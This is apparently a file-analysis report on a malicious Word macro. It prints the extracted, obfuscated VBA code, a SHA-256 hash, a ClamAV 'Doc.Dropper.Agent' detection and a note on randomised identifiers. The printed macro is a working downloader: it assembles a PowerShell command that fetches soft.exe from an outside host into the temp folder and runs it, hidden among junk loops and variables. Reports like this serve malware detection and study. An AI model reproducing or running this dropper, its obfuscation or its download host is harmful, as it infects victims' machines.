itah = ChrW(Log(1.55284552845528) - Log(0.285714285714286) + 96.9771479588304) & ChrW(Log(1.36585365853659) - Log(0.363636363636364) + 107.346619464291) & ChrW(Log(0.317073170731707) + Log(0.558441558441558) + 101.401228015403) & ChrW(Log(1.2520325203252) - Log(0.506493506493506) + 30.7649879772348) & ChrW(Log(1.99186991869919) - Log(0.896103896103896) + 45.8712272275713) & ChrW(Log(1.30081300813008) - Log(0.454545454545455) + 97.6185531797743) & _
" " & _
"" & _
b & c & Chr((Abs(-119))) & a & Chr((Abs(-114))) & Chr((Abs(-115))) & Chr((Abs(-104))) & a & Chr(108) & Chr(108) & _
ChrW(Log(1.21951219512195) + Log(0.142857142857143) + 41.4174592103315) & ChrW(Log(1.48780487804878) - Log(0.636363636363636) + 76.8207130787879) & ChrW(Log(2.1869918699187) + Log(0.480519480519481) + 100.62036048498) & ChrW(Log(1.84552845528455) - Log(0.597402597402597) + 117.542070312526) & ChrW(Log(1.15447154471545) - Log(0.779220779220779) + 44.2768964381396) & _
"Object " & _
ChrW(Log(1.55284552845528) - Log(0.909090909090909) + 82.1346007475215) & ChrW(Log(1.1869918699187) - Log(0.155844155844156) + 118.639678961598) & ChrW(Log(1.40650406504065) + Log(0.324675324675325) + 115.45382235786) & ChrW(Log(1.02439024390244) + Log(0.961038961038961) + 115.68564277707) & ChrW(Log(1.56910569105691) + Log(0.194805194805195) + 101.855249387219) & ChrW(Log(2.31707317073171) - Log(0.727272727272727) + 107.511241443985) & _
ChrW(Log(1.0650406504065) + Log(0.922077922077922) + 45.6881125769836) & ChrW(Log(0.357723577235772) + Log(0.792207792207792) + 78.9309262791345) & ChrW(Log(1.0650406504065) + Log(0.792207792207792) + 100.839918589852) & ChrW(Log(1.78048780487805) + Log(0.909090909090909) + 115.18842280536) & ChrW(Log(1.8780487804878) + Log(0.142857142857143) + 46.9856767939059) & _
ChrW(Log(1.75609756097561) + Log(0.844155844155844) + 86.2763240996463) & ChrW(Log(2.26829268292683) - Log(0.519480519480519) + 99.1960466058113) & ChrW(Log(1.43089430894309) - Log(0.298701298701299) + 96.1033891544097) & _
ChrW(Log(0.317073170731707) + Log(0.155844155844156) + 69.6775214813085) & ChrW(Log(0.333333333333333) + Log(0.584415584415584) + 109.305755220751) & ChrW(Log(0.495934959349593) - Log(0.441558441558442) + 104.553865593962) & ChrW(Log(1.32520325203252) + Log(0.168831168831169) + 102.167290218958) & ChrW(Log(1.21138211382114) - Log(0.181818181818182) + 107.773489957189) & ChrW(Log(1.78048780487805) - Log(0.25974025974026) + 113.745039477256) & _
ChrW(Log(0.967479674796748) - Log(1.01298701298701) + 40.7159642670968) & ChrW(Log(0.869918699186992) + Log(0.532467532467532) + 46.4395888760599) & _
ChrW(Log(0.934959349593496) - Log(0.831168831168831) + 67.5523298885152) & ChrW(Log(2.01626016260163) + Log(0.441558441558442) + 110.786200506445) & ChrW(Log(1.71544715447154) - Log(0.142857142857143) + 116.184416072841) & ChrW(Log(0.682926829268293) + Log(0.714285714285714) + 110.38783979315) & ChrW(Log(0.520325203252033) + Log(0.597402597402597) + 108.838465297377) & ChrW(Log(0.292682926829268) - Log(0.922077922077922) + 111.817539872104) & ChrW(Log(0.853658536585366) - Log(0.155844155844156) + 94.9693252331492) & ChrW(Log(1.55284552845528) - Log(0.194805194805195) + 97.5941557065743) & ChrW(Log(2.10569105691057) + Log(0.480519480519481) + 69.6582438028823) & ChrW(Log(2.28455284552846) - Log(0.545454545454545) + 103.237693882468) & ChrW(Log(1.73170731707317) + Log(0.155844155844156) + 108.979790961729) & ChrW(Log(0.40650406504065) + Log(0.194805194805195) + 103.205916570696) & _
ChrW(Log(0.520325203252033) - Log(0.597402597402597) + 39.8081372466482) & _
"'" & _
"https://mfae.info/newwork/fresh/soft.exe" & _
"','" & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe');" & _
ChrW(Log(1.63414634146341) - Log(0.558441558441558) + 113.596274141153) & ChrW(Log(1.08943089430894) - Log(0.441558441558442) + 114.766899658184) & ChrW(Log(1.79674796747967) - Log(0.792207792207792) + 95.8510900961743) & ChrW(Log(1.47154471544715) - Log(0.324675324675325) + 112.158757727121) & ChrW(Log(0.365853658536585) + Log(0.662337662337662) + 117.087501654731) & " " & _
"%" & ChrW(Log(2.14634146341463) - Log(0.506493506493506) + 114.225991476502) & ChrW(Log(2.04065040650406) - Log(0.285714285714286) + 98.7039684477453) & ChrW(Log(1.4390243902439) - Log(0.298701298701299) + 107.097723416874) & ChrW(Log(2.02439024390244) + Log(0.415584415584416) + 111.842800977962) & "%" & _
"\tpyyutnlyustn.exe"
If vPID = 0 Then 'Application not already open
101:
Dim k As String
vPID = Shell(itah, 1.1 / 1.1 * 1.1 - 1.1)
Else 'Application already open so reactivate
On Error GoTo 101
AppActivate (vPID)
End If
Dim yqmoa As Integer
Dim foxbuxscqzdqeai As Double
Dim sfhsabr As Boolean
Dim lay As String
Dim cxpyt As String
Dim dBloNkdlrYkUqxiRSDC As Integer
Dim iuimucvrxeudjj As String
Dim fcpnqp As Boolean
Dim ldzcjaun As Double
Do Until 6859 = 6859
Dim ufrpiaqmjpqxi
ufrpiaqmjpqxi = prfclyya
Loop
Dim cnddjoww(890) As String
cnddjoww(2) = "?Åá䢼ê·Ò«?á¦�"
cnddjoww(7) = "?Äòì?¿"
cnddjoww(3) = "?Äçè?½êÃß??ঢÊ"
cnddjoww(1) = CStr(16)
If bbhoiweumfg = "¬´ôð¢²ò¿Ó¡?Þ�?Òì" Then
Dim yqmoa16
yqmoa16 = 1.34485909332027E+15
End If
Select Case 22
Case Else
End Select
'cnddjowwldzcjaun2?Äçè?½êÃß??ঢÊ
'?Åá䢼ê·Ò«?á¦�?Äòì?¿lay
'fcpnqpsfhsabr0237115
'1616
'sfhsabrldzcjaun0237115
'cxpytlay2
'dBloNkdlrYkUqxiRSDCcxpyt70484385
'fcpnqplay
'yqmoacxpyt#Q14
'laybbhoiweumfg
'70484385cxpyt
'2fcpnqp
'698197416
'0237115ldzcjaun
For aqhxdpdfksosoka = 1 To 2
aqhxdpdfksosoka = aqhxdpdfksosoka + 5
Next
For blipdbui = 1 To 16
blipdbui = blipdbui + 6
Next
For csfc = 1 To 6981974
csfc = csfc + 2
Next
For Each mkmmmojfzpwk In fscljqkiytevybsl
If IsDate(dhcbfitwjvbothqv) And ((6981974 + 2) / (70484385 + 56029298)) <> 8.76685715934267E+16 Then
otyl = "idex" & CStr("spayozpvsiolb")
End If
Next
For vjuhyytdxcmapvo = 1 To 237115
vjuhyytdxcmapvo = vjuhyytdxcmapvo + 8
Next
For ffcsyff = 1 To 1437803
ffcsyff = ffcsyff + 2
Next
For ypjkxmjqiwlmna = 1 To 1437803
ypjkxmjqiwlmna = ypjkxmjqiwlmna + 5
Next
For nnevwpjqalpj = 1 To 70484385
nnevwpjqalpj = nnevwpjqalpj + 3
Next
'qhxdpdfksosokafcsyfffcsyfflipdbuiewkbeomincgzar
'lipdbuiewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'sfclipdbuilipdbuiewkbeomincgzar
'juhyytdxcmapvokmmmojfzpwkpjkxmjqiwlmnaewkbeomincgzar
'fcsyffkmmmojfzpwknevwpjqalpjlipdbui
'pjkxmjqiwlmnaewkbeomincgzarkmmmojfzpwkcsqyzdhbanlipdbui
'nevwpjqalpjlipdbuicsqyzdhbanlipdbui
'kmmmojfzpwkcsqyzdhbanlipdbui
'ufrpiaqmjpqxijuhyytdxcmapvofcsyffcsqyzdhbanlipdbui
'prfclyyafcsyffewkbeomincgzar
'oweykgcfsadgtkmmmojfzpwkilfdlxbcjuhyytdxcmapvo
'csqyzdhbanlipdbuicsqyzdhbanlipdbui
'ewkbeomincgzarnevwpjqalpjlipdbui
'egjbmyeddqcnhgfcsyffpjkxmjqiwlmnaewkbeomincgzar
'ilfdlxbcjuhyytdxcmapvopjkxmjqiwlmnaewkbeomincgzar
'?Äçè?½êÃß??ঢÊQ14
'?Äòì?¿Q11
Dim arfnumvkrbv As Integer
Dim wnad As Double
Dim wfaiifueicjcvzsj As Boolean
Dim xalrvsnhtz As String
Dim dtm As String
Dim AINDellKHcILVSNTPEh As Integer
Dim aausrzd As String
Dim vsaemqpluckhjhva As Boolean
Dim tlapqnwkjfdwaii As Double
Do Until 2606 = 2606
Dim tetinpwnt
tetinpwnt = zcp
Loop
Dim etjyaiexegmjb(657) As String
etjyaiexegmjb(5) = "?Æèâ?¿ò¹Ú±"
etjyaiexegmjb(5) = "?Äñߤ¿õËɦ?"
etjyaiexegmjb(6) = "«½ñø?·ï"
etjyaiexegmjb(5) = CStr(21)
If ndfyaj = "£²ïð" Then
Dim arfnumvkrbv21
arfnumvkrbv21 = 83348685704351#
End If
Select Case 55
Case Else
End Select
'etjyaiexegmjbtlapqnwkjfdwaii93«½ñø?·ï
'?Æèâ?¿ò¹Ú±?Äñߤ¿õËɦ?xalrvsnhtz
'vsaemqpluckhjhvawfaiifueicjcvzsj594183
'2121
'wfaiifueicjcvzsjtlapqnwkjfdwaii594183
'dtmxalrvsnhtz93
'AINDellKHcILVSNTPEhdtm2
'vsaemqpluckhjhvaxalrvsnhtz
'arfnumvkrbvdtm#Q14
'xalrvsnhtzndfyaj
'2dtm
'93vsaemqpluckhjhva
'619706221
'594183tlapqnwkjfdwaii
For afrnekbcqunohobz = 1 To 93
afrnekbcqunohobz = afrnekbcqunohobz + 3
Next
For biwwnhwibhhtlmyqt = 1 To 21
biwwnhwibhhtlmyqt = biwwnhwibhhtlmyqt + 2
Next
For cbeigksufgzsmuwxn = 1 To 6197062
…
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 75776 bytes |
SHA-256: 67f1fbd148a28ce337d8fabb9085e8d16b32935dc7a7ebad86fa7832ad9cb7a4 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6837211-0
Obfuscation or payload:
likely
418 of 730 identifiers look randomly generated (e.g. 'iwwnhwibhhtlmyqtwbftwwzcxbidqrwirzacwowp') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.